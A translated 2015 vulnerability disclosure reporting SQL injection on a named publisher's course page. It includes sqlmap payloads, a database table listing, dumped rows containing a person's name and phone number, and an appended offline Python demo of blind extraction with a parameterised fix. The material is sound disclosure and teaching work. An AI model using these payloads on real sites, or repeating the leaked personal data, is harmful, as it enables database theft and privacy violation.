
Vulnerability summary (24 followers)

Defect ID: wooyun-2015-0138140

Title: SQL injection on a site of Shanghai Foreign Language Education Press

Affected vendor: sflep.com

Author: 路人甲

Submitted: 2015-08-31 13:04

Fixed: 2015-10-15 14:06

Published: 2015-10-15 14:06

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2015-08-31: Details sent to the vendor, awaiting vendor handling
2015-08-31: Vendor confirmed; details visible to the vendor only
2015-09-10: Details disclosed to core white hats and domain experts
2015-09-20: Details disclosed to regular white hats
2015-09-30: Details disclosed to intern white hats
2015-10-15: Details disclosed to the public

Brief description:

SQL injection on a site of Shanghai Foreign Language Education Press

Detailed description:

http://wg.sflep.com/mainPage/KcDetail.aspx?classid=K201305290001
Injection point: classid
I searched before submitting and there are earlier reports, but the earlier injection points no longer open, so I am submitting this one.
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: classid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: classid=K201305290001' AND 1469=1469 AND 'Xigv'='Xigv
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: classid=K201305290001' AND 7215=CONVERT(INT,(SELECT CHAR(113)+CHAR(106)+CHAR(118)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (7215=7215) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(106)+CHAR(107)+CHAR(113))) AND 'CDNh'='CDNh
---
web server operating system: Windows
web application technology: ASP.NET, ASP.NET 4.0.30319, Nginx
back-end DBMS: Microsoft SQL Server 2005
Database: training
[166 tables]
+-------------------------------+
| Alipay_refund_return |
| Alipay_return |
| D99_CMD |
| D99_Tmp |
| ERPBBSBanKuai |
| ERPBBSTieZi |
| ERPBBSTieZi1 |
| E_ImportAtta |
| E_ImportMail |
| E_MailContent |
| GetNumbers |
| TitleNews |
| View_class_comment |
| add_service_info |
| check_result_info |
| class_attendence_info |
| class_changelog |
| class_comment_info |
| class_detail_time_info |
| class_homework_info |
| class_info |
| class_performance_info |
| class_permit_info |
| class_status_info |
| class_suitable_info |
| class_textbook_info |
| class_time_info |
| class_week_info |
| classroom_info |
| course_info |
| course_info1 |
| dnt_admingroups |
| dnt_adminvisitlog |
| dnt_advertisements |
| dnt_announcements |
| dnt_attachments |
| dnt_attachpaymentlog |
| dnt_attachtypes |
| dnt_banned |
| dnt_bbcodes |
| dnt_bonuslog |
| dnt_creditslog |
| dnt_debatediggs |
| dnt_debates |
| dnt_failedlogins |
| dnt_favorites |
| dnt_forumfields |
| dnt_forumlinks |
| dnt_forums |
| dnt_help |
| dnt_invitation |
| dnt_locations |
| dnt_medals |
| dnt_medalslog |
| dnt_moderatormanagelog |
| dnt_moderators |
| dnt_myattachments |
| dnt_myposts |
| dnt_mytopics |
| dnt_navs |
| dnt_notices |
| dnt_online |
| dnt_onlinelist |
| dnt_onlinetime |
| dnt_orders |
| dnt_paymentlog |
| dnt_pms |
| dnt_polloptions |
| dnt_polls |
| dnt_postdebatefields |
| dnt_postid |
| dnt_posts1 |
| dnt_ratelog |
| dnt_scheduledevents |
| dnt_searchcaches |
| dnt_smilies |
| dnt_statistics |
| dnt_stats |
| dnt_statvars |
| dnt_tablelist |
| dnt_tags |
| dnt_templates |
| dnt_topicidentify |
| dnt_topics |
| dnt_topictagcaches |
| dnt_topictags |
| dnt_topictypes |
| dnt_trendstat |
| dnt_userfields |
| dnt_usergroups |
| dnt_users |
| dnt_words |
| email_content |
| fridenly_link |
| gateway_info |
| image_database |
| image_database2 |
| message_contents |
| message_record |
| news_info |
| news_type_info |
| operate_log |
| order_info |
| order_status_info |
| order_type_info |
| p_menu |
| p_menu1 |
| p_menu2 |
| p_right |
| p_right1 |
| p_role |
| p_role_content |
| p_role_type |
| paper_level_hl |
| paper_manage |
| paper_record |
| pay_type_info |
| proc_err_trace |
| professional_title_info |
| question |
| question_blank |
| question_judge |
| question_type |
| school_introduction |
| send_recoder |
| send_sms_recorde |
| sms_content |
| sms_content2 |
| smtp_set |
| staff |
| staff_hl |
| style |
| suitable_info |
| sysdiagrams |
| t_pwd_reset |
| t_pwd_reset_log |
| teacher |
| teacher_comment_info |
| test |
| textbook_info |
| user_class_detail_info |
| user_class_info |
| user_info |
| user_status |
| v_BBS |
| v_action |
| v_class_info |
| v_class_permit_info |
| v_class_suitable_info |
| v_class_textbook_info |
| v_class_time_info |
| v_courseadmin_user_class_info |
| v_eduadmin_user_class_info |
| v_menu_role |
| v_news_info |
| v_order_info |
| v_staff_role_info |
| v_staff_teacher |
| v_teacher_comment_info |
| v_test |
| v_test_course_id |
| v_user_class_detail_info |
| v_user_class_info |
| v_video_info |
| video_info |
| video_type_info |
+-------------------------------+
Database: training
+------------------+---------+
| Table | Entries |
+------------------+---------+
| dbo.E_ImportMail | 171647 |
+------------------+---------+
Well over a hundred thousand mail records; the table can be dumped.
| 10000 | 58 | 马达121 | 13402128709 | NULL | -1 | [email protected] |
| 100000 | 161 | 张少琼 | <blank> | NULL | -1 | [email protected] |
| 100001 | 161 | 张生祥 | <blank> | NULL | -1 | [email protected] |

Proof of vulnerability:

1

Remediation:

1

Copyright notice: when reposting, credit the source, 路人甲@乌云
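The sqlmap output above shows the two things that make this finding exploitable: the boolean-based payload (`' AND 1469=1469 AND 'Xigv'='Xigv`) turns the page into a true/false oracle, and once an attacker has an oracle every value in the `training` database (the `E_ImportMail` rows, the `dnt_users` table, the table list itself) can be recovered one character at a time. The added example below, which is not part of the original report and not the vendor's code, reproduces that mechanism offline: an in-memory SQLite database stands in for the MSSQL 2005 `training` database, `kc_detail_vulnerable` mirrors the string-concatenated `classid` lookup behind KcDetail.aspx, and `blind_extract` performs the binary-search extraction that sqlmap automates. All table contents, the function names and the `title`/`email` columns are constructed assumptions; the MSSQL-specific `CONVERT(INT, ...)` error-based trick from the second payload has no SQLite equivalent and is not reproduced. `kc_detail_fixed` shows the remediation the report left blank: bind `classid` as a parameter so the same payload matches nothing.

```python
import sqlite3


def build_db():
    """Constructed stand-in for the 'training' database (contents are invented)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE class_info (classid TEXT, title TEXT)")
    conn.execute("CREATE TABLE E_ImportMail (id INTEGER, name TEXT, phone TEXT, email TEXT)")
    conn.execute("INSERT INTO class_info VALUES (?, ?)", ("K201305290001", "Sample course"))
    conn.execute(
        "INSERT INTO E_ImportMail VALUES (?, ?, ?, ?)",
        (100000, "constructed user", "", "u1@example.invalid"),
    )
    return conn


def kc_detail_vulnerable(conn, classid):
    """Mirrors the flaw: the untrusted classid is spliced into the WHERE clause."""
    sql = "SELECT title FROM class_info WHERE classid = '" + classid + "'"
    return conn.execute(sql).fetchall()


def kc_detail_fixed(conn, classid):
    """Hardened form: classid is bound as a parameter, never parsed as SQL."""
    sql = "SELECT title FROM class_info WHERE classid = ?"
    return conn.execute(sql, (classid,)).fetchall()


def oracle(conn, condition):
    """True when the page still returns the course row with `condition` ANDed in.

    The wrapper is the same shape as sqlmap's boolean-based payload:
    K201305290001' AND <condition> AND 'Xigv'='Xigv
    """
    payload = "K201305290001' AND (" + condition + ") AND 'Xigv'='Xigv"
    return len(kc_detail_vulnerable(conn, payload)) > 0


def blind_extract(conn, subquery, max_len=64):
    """Recover the scalar result of `subquery` through the oracle alone.

    For each position, a binary search over the ASCII range needs at most
    seven true/false requests; extraction stops when the string runs out.
    (SQLite's unicode()/substr() play the role of MSSQL's ASCII()/SUBSTRING().)
    """
    result = ""
    for pos in range(1, max_len + 1):
        if not oracle(conn, f"length(({subquery})) >= {pos}"):
            break
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(conn, f"unicode(substr(({subquery}), {pos}, 1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        result += chr(lo)
    return result


if __name__ == "__main__":
    db = build_db()
    # The two probes sqlmap uses to confirm a boolean-based injection.
    print("1469=1469 ->", oracle(db, "1469=1469"))
    print("1469=1470 ->", oracle(db, "1469=1470"))
    # Enumerate a table name, then dump a row from the mail table, through the oracle.
    print(blind_extract(db, "SELECT name FROM sqlite_master WHERE type='table' ORDER BY name LIMIT 1"))
    print(blind_extract(db, "SELECT email FROM E_ImportMail WHERE id = 100000"))
    # Same payload against the parameterised query: no row, no oracle.
    print(kc_detail_fixed(db, "K201305290001' AND 1469=1469 AND 'Xigv'='Xigv"))
```

Run it as a script and the first two lines print True and False, which is exactly the differential sqlmap looks for before it starts extracting; every later request in a real dump is just another instance of that same true/false question. The fix is the parameterised query, not input filtering: `K201305290001' AND ...` is a perfectly valid string for a bound parameter, it simply does not match any classid.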


Vendor response

Vendor reply:

Severity: High

Vulnerability Rank: 15

Confirmed: 2015-08-31 14:04

Vendor comment:

Thanks for pointing out the vulnerability.

Latest status:

None yet